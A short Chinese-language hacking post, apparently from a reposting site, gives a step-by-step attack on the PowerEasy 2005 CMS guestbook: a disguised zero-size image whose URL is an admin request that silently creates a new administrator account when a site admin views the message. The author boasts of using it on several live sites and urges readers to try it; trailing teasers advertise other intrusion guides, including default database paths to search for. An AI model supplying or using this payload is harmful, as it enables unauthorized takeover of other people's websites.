通杀动易2005的 XSS 攻击 动易2005里面,留言的时候存在一个XSS。攻击方法如下 :首先在网站注册一个普通会员,然后去GUESTBOOK留言,在插入图片的时候地址写上(建议在原代码里面把图片的高度与宽度都设... 08-10-08
动易2005里面,留言的时候存在一个xss。
攻击方法如下 :
首先在网站注册一个普通会员,然后去guestbook留言,在插入图片的时候地址写上(建议在原代码里面把图片的高度与宽度都设置成0,这样在图片前面加上这个连接,基本上就看不见图片了,图片的连接却被管理员解吸执行了):
http://localhost/powereasy/admin/admin_admin.asp?adminname=xiaod&username=xiaod&password=123456&pwdconfirm=123456&purview=1&action=saveadd
上面是本地测试地址。
只要你的留言写的足够诱惑,只要管理员一看,就ok了,他回复了你,你就是后台管理员了···
我自己测试了几个站,结果都成功了,呵呵。大家也可以去测试一下,通杀了 sql 与ac版···
相关文章:
-
互联网入侵攻防实战
互联网入侵攻防实战 几种入侵方式 首先请安装WIN2000系统,然后打开扫描软件X-Scan2.3,再点击“设置/扫描参数”,在出...
[阅读全文]
-
黑客入侵无线网络常用手段
黑客入侵无线网络常用手段 现在无线宽频上网越来越流行,但许多无线网络并没有采取安全防护措施,不但易遭黑客入侵,而且事后追查凶手都很困难。 专家提醒,黑客入...
[阅读全文]
-
-
入侵与反入侵案例
入侵与反入侵案例 同学给我介绍了一个电子商务网站,因为自己读的就是电子商务专业,加上对网络安全比较感兴趣,所以看了这样的好网站,当然要帮忙测试下网络安全啦,首...
[阅读全文]
-
入侵搜索关键字
入侵搜索关键字 默认数据库: Databases/myszw.mdb Databases/myszw1.mdb 上传 upload_Photo.asp?P...
[阅读全文]
-
入侵JSP网站服务器
入侵JSP网站服务器 在用JSP制作的电子商务网站多如牛毛。但是对于JSP网站而言,安全性真的能够让人放心吗?面对层出不穷的黑客攻击和病毒袭击,JSP网站的服...
[阅读全文]
版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。
如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。
发表评论